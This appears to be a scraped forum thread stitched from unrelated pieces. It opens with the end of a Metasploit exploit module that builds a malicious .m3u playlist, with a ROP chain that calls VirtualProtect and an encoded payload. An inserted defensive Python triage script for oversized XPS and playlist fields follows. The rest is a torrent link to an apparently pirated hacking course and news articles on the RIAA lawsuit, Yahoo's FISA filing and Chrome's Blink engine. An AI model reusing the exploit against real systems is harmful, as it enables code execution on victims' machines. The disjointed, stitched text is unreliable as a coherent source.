      'DisclosureDate' => 'Jun 24 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
      ], self.class)
  end

  def junk(n=1)
    return [rand_text_alpha(4).unpack("L")[0]] * n
  end

  def nops(rop=false, n=1)
    return rop ? [0x6ab16202] * n : [0x90909090] * n
  end

  def exploit
    # fixed rop from mona.py
    rop_gadgets =
      [
        nops(true,35),  # ROP NOP
        0x100482ff,     # POP EAX # POP EBP # RETN [jpeg.dll]
        0xffffffc0,     # negate will become 0x00000040
        junk,
        0x66d9d9ba,     # NEG EAX # RETN [avutil-52.dll]
        0x6ab2241d,     # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN [swscale-2.dll]
        junk(15),       # reserve more junk for add esp,2c
        0x1004cc03,     # POP ECX # RETN [jpeg.dll]
        0x6ab561b0,     # ptr to &VirtualProtect() [IAT swscale-2.dll]
        0x66d9feee,     # MOV EAX,DWORD PTR DS:[ECX] # RETN [avutil-52.dll]
        0x6ab19780,     # XCHG EAX,ESI # RETN [swscale-2.dll]
        0x66d929f5,     # POP EAX # POP EBX # RETN [jpeg.dll]
        0xfffffcc0,     # negate will become 0x0000033f
        junk,
        0x6ab3c65a,     # NEG EAX # RETN [postproc-52.dll]
        0x1004cc03,     # POP ECX # RETN [jpeg.dll]
        0xffffffff,     #
        0x660166e9,     # INC ECX # SUB AL,0EB # RETN [libiconv-2.dll]
        0x66d8ae48,     # XCHG ECX,EBX # RETN [avutil-52.dll]
        0x1005f6e4,     # ADD EBX,EAX # OR EAX,3000000 # RETN [jpeg.dll]
        0x6ab3d688,     # POP ECX # RETN [jpeg.dll]
        0x6ab4ead0,     # Writable address [avutil-52.dll]
        0x100444e3,     # POP EDI # RETN [swscale-2.dll]
        nops(true),     # ROP NOP [swscale-2.dll]
        0x100482ff,     # POP EAX # POP EBP # RETN [jpeg.dll]
        nops,           # Regular NOPs
        0x6ab01c06,     # PUSH ESP# RETN [swscale-2.dll]
        0x6ab28dda,     # PUSHAD # RETN [swscale-2.dll]
      ].flatten.pack("V*")

    sploit = "http://"
    sploit << rand_text(target['Offset'])
    sploit << [target.ret].pack('V')
    sploit << rop_gadgets
    sploit << make_nops(16)
    sploit << payload.encoded
    sploit << rand_text(target['Max']-sploit.length)

    file_create(sploit)
  end

end
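Both file-format bugs above come down to one oversized field: an XPS zip entry name around the 4640-byte 'Offset' for Corel PDF Fusion (post 19), and an .m3u line of "http://" plus roughly 849 bytes for MediaCoder (posts 13 and 20). As an added example in Python, not Metasploit code and not from either module, here is a triage routine a defender could run on inbound files: it inspects an XPS container with the standard zipfile module without extracting it and scans a playlist line by line. The thresholds and the sample files, built in memory, are assumptions.

```python
"""Triage XPS containers and .m3u playlists for the oversized fields the two
Metasploit modules above rely on. Added example, not part of either module;
the thresholds are assumptions and the sample files are constructed in memory."""

import io
import zipfile
from typing import Dict, List

# Corel PDF Fusion 1.11 overflows at an entry-name offset of 4640 bytes (the
# module's 'Offset'); MediaCoder at 849 bytes after "http://". Flag well below
# those values so padded or slightly shorter variants are caught too.
XPS_NAME_LIMIT = 1024      # assumption: benign XPS part names are far shorter
M3U_LINE_LIMIT = 512       # assumption: real playlist URLs are far shorter

# Parts a minimal XPS package is expected to carry (taken from the module's template list).
XPS_EXPECTED = {"[Content_Types].xml", "_rels/.rels", "FixedDocSeq.fdseq"}


def triage_xps(data: bytes) -> Dict[str, object]:
    """Inspect an XPS (OPC zip) package without extracting anything.

    Returns {'is_zip', 'entries', 'oversized', 'missing_parts'}. Oversized
    names are truncated for reporting so the finding itself stays small.
    """
    report: Dict[str, object] = {"is_zip": False, "entries": 0, "oversized": [], "missing_parts": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return report
    with zf:
        names = zf.namelist()
        report["is_zip"] = True
        report["entries"] = len(names)
        report["oversized"] = [n[:40] + "..." for n in names if len(n.encode("utf-8")) > XPS_NAME_LIMIT]
        report["missing_parts"] = sorted(XPS_EXPECTED - set(names))
    return report


def triage_m3u(data: bytes) -> List[int]:
    """Return 1-based line numbers of playlist entries longer than M3U_LINE_LIMIT.
    Directive lines (#EXTM3U, #EXTINF) are skipped; bad UTF-8 is tolerated."""
    text = data.decode("utf-8", errors="replace")
    hits: List[int] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if len(entry) > M3U_LINE_LIMIT:
            hits.append(lineno)
    return hits


def build_xps(entry_names: List[str]) -> bytes:
    """Construct an in-memory zip with the given entry names (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in entry_names:
            zf.writestr(name, "x")
    return buf.getvalue()


# Constructed samples: one benign and one suspect file of each kind.
BENIGN_XPS = build_xps(["[Content_Types].xml", "_rels/.rels", "FixedDocSeq.fdseq", "Documents/1/Pages/1.fpage"])
SUSPECT_XPS = build_xps(["[Content_Types].xml", "_rels/.rels", "FixedDocSeq.fdseq", "Resources/" + "A" * 4640 + "/x"])
BENIGN_M3U = b"#EXTM3U\n#EXTINF:123,Sample\nhttp://media.example/track1.mp3\n"
SUSPECT_M3U = b"#EXTM3U\n" + b"http://" + b"A" * 849 + b"BBBB" + b"\n"

if __name__ == "__main__":
    print(triage_xps(SUSPECT_XPS))
    print(triage_m3u(SUSPECT_M3U))
```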
21. In a minute none of them works anymore.
22. Simpler: http://isohunt.com/torrent_details/371592937/Certified+Ethical+Hacker+v7?tab=summary
23. Jammie Thomas-Rasset testifies in her first civil trial in 2007, while U.S. District Judge Michael Davis watches from the bench. Illustration: Cate Whittemore/Wired

Did you hear the one about the world’s most infamous music file-sharer being asked to publicly extol the virtues of the Recording Industry Association of America’s anti-piracy platform?

The RIAA is suggesting Jammie Thomas-Rasset do just that. In exchange, the recording studios’ lobbying and litigation arm would reduce a $222,000 jury verdict the Supreme Court let stand in May — her punishment for sharing 24 songs on the now-defunct file-sharing service Kazaa.

However, the 36-year-old mother of four and the nation’s first file-sharer to challenge a Recording Industry Association of America lawsuit, said she would rather go bankrupt.

“I’m not doing it,” the Minnesota woman said in a telephone interview today. She said she earns a small salary working in the natural resources department of a local Native American tribe.

The RIAA’s overture, which did not specify how much it would relieve of the debt, comes four months after the Supreme Court declined (.pdf) to review Thomas-Rasset’s petition claiming the damages award was unconstitutionally excessive and was not rationally related to the harm she caused the music labels.

In a statement, RIAA spokesman Jonathan Lamy said :

Thomas-Rasset’s attorney, Michael Wilson, said in a telephone interview today that “the record industry was offering a kind of a public statement as a possible supplement so she wouldn’t have to pay the full amount.” He said the RIAA offered “no specifics.”

“It was kind of a general idea, nothing concrete,” Wilson added. “I would assume it would be something along those lines: anti-piracy and culpability.”

Wilson said that, because “she is pretty opposed” to making a statement, he is exploring the possibility that Thomas-Rasset file for bankruptcy protection to keep the damages award at bay.

This wouldn’t be the first time the RIAA has sought a public-service announcement from a file-sharer. In 2009, a Los Angeles man was sentenced to two months’ home confinement and a year of probation for uploading nine unreleased tracks of Guns N’ Roses’ Chinese Democracy to his music site. Federal prosecutors initially sought six months of prison, but Cogill got no time after agreeing to do an RIAA public service announcement that would scare future file sharers straight. But the RIAA never made Kevin Cogill follow through.

Meantime, Thomas-Rasset’s legal odyssey dates to 2007. The RIAA’s litigation had a tortuous history involving a mistrial and three separate verdicts for the same offense — $222,000, $1.92 million and $1.5 million.

Out of the thousands who were sued, the only other file-sharer to challenge an RIAA lawsuit at trial was Joel Tenenbaum, then a Massachusetts college student, whose case followed Thomas-Rasset’s. A federal appeals court last month upheld a Boston federal jury’s award of $675,000 against him for sharing 30 songs.

Most of the thousands of RIAA file-sharing cases against individuals have settled out of court for a few thousand dollars. In 2008, the RIAA ceased a five-year campaign it had launched to sue individual file sharers and, with the Motion Picture Association of America, has since convinced internet service providers to begin taking punitive action against copyright scofflaws.

Source: Wired.Com
  24. Yahoo! has launched a fresh bid to reveal the top secret workings of the US surveillance state and prove it did not voluntarily hand over its customer's data to NSA spooks. The Purple Palace wants to lift a seal on a 2008 court case in which the firm "strenuously objected" to the National Security Agency's requests for its customers' info. Yahoo! was overruled and the US government was subsequently given powers to harvest information from major internet firms. Yahoo! outlined its request in a filing with the Foreign Intelligence Surveillance Act (FISA) court, the Mercury News reports. Until last month, when news broke about the NSA's top-secret PRISM surveillance programme, Yahoo! was not even allowed to say it was a party in the court case, which was kept classified under the Foreign Intelligence Surveillance Act. If details of the court case are released, it would shed light on the workings of the NSA and the methods they use to spy on foreign nationals as well as American citizens. "Release of this Court's decision and the parties' briefing is necessary to inform the growing public debate about how this Court considers and examines the Government's use of directives," Yahoo! attorneys Marc Zwillinger and Jacob Sommer wrote in a filing to the FISA court. "Courts have long recognized the public has a right to access court records." Yahoo! has already released details of exactly how many times spooks made data requests, but it is not allowed to say exactly how many were made under secret FISA legislation, which allows spooks to ask for personal data. Its most recent court filing is the most explicit assault any internet firm has made on the secrecy surrounding the FISA courts, according to Alex Abdo, an American Civil Liberties Union attorney. He told Mercury News: "This is the first time we've seen one of these companies making this broad an argument in favor of transparency in the FISA court." 
The existence of the NSA's PRISM surveillance system was first revealed by IT boffin-turned-deepthroat Edward Snowden, who is still on the run from US authorities. He revealed spies could snoop on users of most of the world's common communications services through metadata from online communications and mobile phone call records. The public still does not know the full details of NSA spying, something all of the big internet firms want to change. Facebook, Microsoft and Google all want to reassure customers around the world that they didn't simply allow spooks to have unfettered access to their servers, but only responded to specific requests. "Revealing what went on in the court is critical to having a democracy," Jennifer Stisa Granick, from Stanford University law school's Centre for Internet and Society, told the paper. "If Yahoo is successful in revealing what the court did and why, then we will know more about the laws our government is purportedly operating under, which sadly we don't currently know." ® Source: TheRegister.co.uk
  25. Blink, the browser rendering engine Google summoned into existence after becoming disgruntled with progress on the Apple-led Webkit, has made its debut in Windows and Mac OS, after having made its way to Linux last month. The engine is embedded in Chrome 28, available now in Chrome's stable channel. Google revealed plans to create Blink back in April, when it declared that more rendering engines would mean more innovation. Few swallowed that explanation, as Google has many reasons to direct development of as much of Chrome's innards as it can in order to ensure the browser plays nicely with its myriad services. As we noted at that time, the Chocolate Factory was already unhappy with some aspects of Webkit. That meant “Chrome never used WebKit in quite the same way that Safari did. For example, Chrome ignored WebKit's JavaScriptCore component in favor of Google's homegrown JavaScript engine, V8. It also handled multiple browser processes in a significantly different way than Safari did.” Google hinted at “major architectural changes” in Blink, which as a fork of WebKit started with the same code base. Few changes are apparent to users in Chrome 28, which Vulture South used to publish this story without being required to do anything new. The most visible change is a new notifications centre that runs in the Windows and Chrome OS versions of the browser. Vulture South's Mac-happy office hasn't checked that out, but did spot the rather different-looking error message below that, when we clicked on the 'More' button, produced the full text of Chrome's "ERR_NAME_NOT_RESOLVED" notification. The update process may not, however, be entirely hassle-free: once we learned of Chrome 28's existence, Chrome 27 reported it could find no updates. A discrete installation of Chrome 28 was therefore necessary to bring you this article. ® Source: TheRegister.co.uk